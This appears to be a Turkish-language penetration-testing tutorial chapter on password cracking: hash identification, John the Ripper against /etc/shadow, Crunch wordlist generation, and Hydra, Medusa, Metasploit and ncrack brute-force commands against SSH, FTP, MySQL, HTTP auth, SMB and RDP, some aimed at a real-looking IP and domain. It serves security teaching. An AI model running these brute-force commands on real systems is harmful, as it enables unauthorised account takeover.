Şifre Kırma Saldırıları

13. ŞİFRE KIRMA SALDIRILARI

13.1 Hash Tipinin Bulunması

Sızma Testlerinde Elde Etğimiz hashli şifreleri kırmak için önce bu hashlerin tipini belirlememiz gerekir .Bu İşlem için Hash_ID scriptini kullanabiliriz.

Hash_ID scritpi ile bulduğunuz hashlerin tipini belirleyebilirsiniz.

https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/hash-identifier/Hash_ID_v1.1.py

 

wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/hash-identifier/Hash_ID_v1.1.py
#Bu şekilde yükleyebiliriz.

md5sum suattest-01.cap
c16466ec4336c5765d8c6f40ae97ee06  suattest-01.cap

python Hash_ID_v1.1.py
HASH: c16466ec4336c5765d8c6f40ae97ee06
Possible Hashs:
[+]  MD5
[+]  Domain Cached Credentials – MD4(MD4(($pass)).(strtolower($username)))

Least Possible Hashs:
[+]  RAdmin v2.x
[+]  NTLM
[+]  MD4
[+]  MD2
[+]  MD5(HMAC)
[+]  MD4(HMAC)
[+]  MD2(HMAC)
[+]  MD5(HMAC(WordPress))
[+]  Haval-128
[+]  Haval-128(HMAC)
[+]  RipeMD-128
[+]  RipeMD-128(HMAC)
[+]  SNEFRU-128
[+]  SNEFRU-128(HMAC)
[+]  Tiger-128
[+]  Tiger-128(HMAC)
[+]  md5($pass.$salt)
[+]  md5($salt.$pass)
[+]  md5($salt.$pass.$salt)
[+]  md5($salt.$pass.$username)
[+]  md5($salt.md5($pass))
[+]  md5($salt.md5($pass))
[+]  md5($salt.md5($pass.$salt))
[+]  md5($salt.md5($pass.$salt))
[+]  md5($salt.md5($salt.$pass))
[+]  md5($salt.md5(md5($pass).$salt))
[+]  md5($username.0.$pass)
[+]  md5($username.LF.$pass)
[+]  md5($username.md5($pass).$salt)
[+]  md5(md5($pass))
[+]  md5(md5($pass).$salt)
[+]  md5(md5($pass).md5($salt))
[+]  md5(md5($salt).$pass)
[+]  md5(md5($salt).md5($pass))
[+]  md5(md5($username.$pass).$salt)
[+]  md5(md5(md5($pass)))
[+]  md5(md5(md5(md5($pass))))
[+]  md5(md5(md5(md5(md5($pass)))))
[+]  md5(sha1($pass))
[+]  md5(sha1(md5($pass)))
[+]  md5(sha1(md5(sha1($pass))))
[+]  md5(strtoupper(md5($pass)))

#Gördüğümüz gibi md5sum ile bir dosyanın hash’ni aldım daha sonra bu hash değerini
Hash_ID_v1.1.py scritine sorduğumda hash’in md5 türünde olduğunu gösterdi.

13.2 John The Ripper ile Hashli Parolaların Kırılması

john –format=raw-MD5 md5hashdosyası.txt
#MD5 hashli parolaları kırmak için kullanabiliriz.

john –format=raw-sha256 sha256hashdosyası.txt
#SHA256  Hash’li parolaları kırmak için kullanabiliriz.

john /etc/shadow
#Linux sunuculrda yerel kullanıcıların şifresini kırmak için kullanabiliriz.
Sunucularda sıkılaştırrma yaparken yetersiz parolaları tespit etmek içinde kullabiliriz.

13.3 Cain-Abel Programı ile Şifre Kırma Saldırıları

Cain&Abel programını indririrek grafik arayüzünde şifre kırma işlemini gerçekleştirebilirsiniz.

http://www.oxid.it/cain.html Adresinden İndirebilirsiniz.

(Not: Bu tür Programlar zararlı yazılım içerebileceğinden sanal makine üzerine kurmanız güvenliğiniz açısından daha iyi olacaktır.)

Şifre Kırma Saldırıları

13.4 Crunch ile Wordlist Oluşturma

Crunch Programı ile şifre kırmaya yönelik kaba kuvvet saldırılarında kullanmak üzere bir wordlist oluşturabiliriz.

cd /usr/share/crunch/
crunch 1 8 -f charset.lst numeric -o kelimelistesi1.txt
#1ile 8 karakterden oluşan rakamları kullanarak şifreleri oluşturabiliriz.

crunch 1 8 234567890 numeric -o kelimelistesi1.txt
#”234567890″  rakamlarını kullnarak 1 ile 8 arasında ki uzunlukta şifreler oluşturur.
Crunch ile -t parametresi ile özel kendi wordlistinizi oluşturabilirsiniz

-t @,%^

Specifies a pattern, eg: @@god@@@@ where the only the @’s, ,’s, %’s, and ^’s will change.

@ will insert lower case characters(Küçük harf)

, will insert upper case characters(Büyük harf)

% will insert numbers(rakam)

^ will insert symbols(özel karakter)

crunch 8 8 -t ^@suat@,^ -o ozel.txt
#içinde suat kelimesi geçen geçen ilk harfi özel karakter,ikinci harfi küçük harf,son 3 harfide sırayla küçük harf,büyük harf ve özel karakterden oluşan kelime listesi oluşturmuş oluruz.

crunch 2 3 -f /usr/share/crunch/charset.lst lalpha-numeric -o sifreler.txt
#Yukarıda ki komut satırında “2 3″ olarak belirtilen en az 2 en fazla 3 karakterlik veri  oluşturulacağını, “-f” karakter kümesinin alınacağı dosya (charset.lst), “lalpha-numeric”  karakter kümesi yani “[abcdefghijklmnopqrstuvwxyz0123456789]” kümesi , “-o” parametresi ise oluşturulacak wordlist’i bir dosyaya aktarılmasını sağlar (örnekte sifreler.txt dosyasına aktarılmıştır).

13.5 Özelleştirilmiş Sözcük Listesi Oluşturma

Eğer Kırmaya Çalıştığımız Şifrenin bir kısmını ele  geçirdiysek  veya oluşturacağımız kelime listesinde tahmin ettiğimiz bir kelime varsa , önce crunch programı ile bir wordlist oluşturup daha sonra sifrematik.bash scripti ile şifrenin ele geçirdiğimiz kısmını crunch programı ile oluşturduğumuz wordliste  ekleyebiliriz.

Örneğimizde toplam 6 karakterli bir wordlist oluşturacağz ve bu wordlistte ali kelimesi geçecek geri kalan karakterler tüm karakterlerden oluşabilir..

/usr/share/crunch# crunch 3 3 -f charset.lst mixalpha-numeric-all  -o kelimelistesi.txt
#İlk önce 3 karakterden oluşan ve olası tüm karakterleri içeren kelime listesi oluştruruz.

/usr/share/crunch# cat sifrematik.bash
#!/bin/bash
for var in `cat kelimelistesi.txt`
do
echo suat$var >> yenikelimelistesi.txt
done
######################################################
for var in `cat kelimelistesi.txt`
do
echo ${var:0:1}suat${var:1:4} >> yenikelimelistesi.txt
done
####################################################
for var in `cat kelimelistesi.txt`
do
echo ${var:0:2}suat${var:2:4} >> yenikelimelistesi.txt
done
###################################################
for var in `cat kelimelistesi.txt`
do
echo $var”suat” >> yenikelimelistesi.txt
done
###################################################
#
chmod u+x sifrematik.bash
bash sifrematik.bash

#Oluşturduğumuz 3 rakamdan oluşan olası tüm karakterleri içeren kelime listesinine suat kelimesini ekleriz.
BÖYLECE Şifresinin bir kısmını bildiğimiz kurbana özel kelime listesi oluştururak kaba kuvvet saldırısı yapabiliriz.

13.6 İnternetten Sözcük Listesi ve Hash Aranması

http://cyberwarzone.com/cyberwarfare/pas…word-lists

http://hashcrack.blogspot.de/p/wordlist-…ds_29.html

http://www.skullsecurity.org/wiki/index.php/Passwords

http://packetstormsecurity.org/Crackers/wordlists/

http://www.isdpodcast.com/resources/62k-…-passwords

http://g0tmi1k.blogspot.com/2011/06/dict…lists.html

http://www.md5this.com/tools/wordlists.html

http://www.md5decrypter.co.uk/downloads.aspx

http://packetstormsecurity.com/Crackers/wordlists/

http://packetstormsecurity.com/Crackers/wordlists/

#Adreslerinden kelime listelerini indirebiliriz.

ls -l /usr/share/wordlists/
#Kali sunucuda wordlist dizininde çeşitli kelime listelerini kullanabiliriz.

intext:[HASH KODU]
#google cash(önbellek)’inde hash değerini arayabiliriz.


https://crackstation.net/
http://www.hashkiller.co.uk/
http://www.onlinehashcrack.com/

#Web sitelerinden hash değerlerini kırmaya çalışabilirsiniz.

13.7 Hydra ile SSH&FTP/HTTP-BASIC-AUTH Kaba Kuvvet Saldırısı

cat kullanicilar.txt
suat
admin
yonetici
administrator
root
veli
mehmet
root2
webmaster
webadmin
root3
test
Anonymous
cat sifreler.txt
123
321
aa112
234
1234
123456
123321
administrator
P@ssw0rd
password
sifre
1
admin123
root123
Anonymous

hydra -L kullanicilar.txt  -P sifreler.txt 104.131.103.129 ssh -s 22
#Kullanıcı listesini ve şifre kelimelistesini oluşturup ssh servisine brute force yapabiliriz.

hydra -L kullanicilar.txt  -P sifreler.txt 104.131.103.129 ftp -e n
#Kullanıcı listesini ve şifre kelimelistesini oluşturup ftp servisine brute force yapabiliriz.

hydra -L kullanicilar.txt  -P sifreler.txt 104.131.103.129 mysql -e ns
#Kullanıcı listesini ve şifre kelimelistesini oluşturup mysql servisine brute force yapabiliriz.

hydra -L kullanicilar.txt  -P sifreler.txt  -f http://munuklu.com
#Kullanıcı listesini ve şifre kelime listesini oluşturup http basic authentication kullanan sayfalara kaba kuvvet #saldırısı yapabiliriz.

13.8 Medusa ile SSH & FTP & HTTP BASİC AUTH Kaba Kuvvet Saldırısı

cat kullanicilar.txt
suat
admin
yonetici
administrator
root
veli
mehmet
root2
webmaster
webadmin
root3
test
Anonymous
cat sifreler.txt
123
321
aa112
234
1234
123456
123321
administrator
P@ssw0rd
password
sifre
1
admin123
root123
Anonymous

medusa -h 104.131.103.129 -U kullanicilar.txt  -P sifreler.txt  -M ssh -F
#Medusa ile ssh kaba kuvvet saldırısı gerçekleştirebeiliriz.

medusa -h 104.131.103.129 -U kullanicilar.txt  -P sifreler.txt  -M ftp -F
#Medusa ile ftp kaba kuvvet saldırısı gerçekleştirebeiliriz.

medusa -h munuklu.com -U kullanicilar.txt  -P sifreler.txt  -M http –F
#http basic authentication koruması olan sayfalara kaba kuvvet saldırısı yapabiliriz.

13.9 Metasploit ile Windows Samba Paylaşımlarına Kaba Kuvvet Saldırıları

nmap -sS -sV -n -v -PN 192.168.10.0/24 -p 445 | grep open
#İlk önce nmap ile 445 portları açık olan sunucuları tararız ve 445 portu açık olan sunucuya metasploit ile kaba kuvvet saldırısı yapabiliriz.

Msfconsole
use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.1.0/24
192.168.1.0/24
set SMBUser Suat
deneme
smbPASS 123321
123321
exploit
#İstediğimiz networke belittiğimiz kullanıcı ve şifreyle kaba kuvvet saldırısı yapabiliriz.(Nmap ile önceden #taratıp sadece 445 portu açık olanlarada kaba kuvvet saldırısı yapabiliriz)

13.10 Ncrak ile RDP Kaba Kuvvet Saldırıları

nmap -sT -sV -n -v -PN 192.168.10.0/24 -p 3389 –open | grep “Nmap scan report for” | awk ‘{print $5}’ >> rdp-aciksunucular
#Rdp portu açık olan sunucuların listesini dosyaya kaydederiz.

cat kullanicilar.txt
suat
mehmet
admin
yonetici
administrator
root
veli
cat sifreler.txt
123
123321
321
aa112
234
1234
123456
administrator
P@ssw0rd
#Kaba Kuvvet saldırısında Kullanacağımız Wordlistleri oluştururuz.
ncrack -iL rdp-aciksunucular -U kullanicilar.txt -P sifreler.txt -p rdp -v
#ncrack programı ile rdp için kaba kuvvet saldırısı yapabiliriz.

13.11 Hashcat CPU/GPU Kullanarak Hash Kırma

https://hashcat.net/ adresinden hashcat veya oclHashcat+ programlarını indirerek ele geçirdiğimiz hash’leri kırmak için kullanabiliriz.

hashcat versiyonu ile cpu’yu kullanarak hashleri kırabiliriz.(multi thread destekler)

oclHashcat versiyonu ile gpu(amd veya nvdia) kullanarak hashli şifreleri kırabiliriz.

You may also like...

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir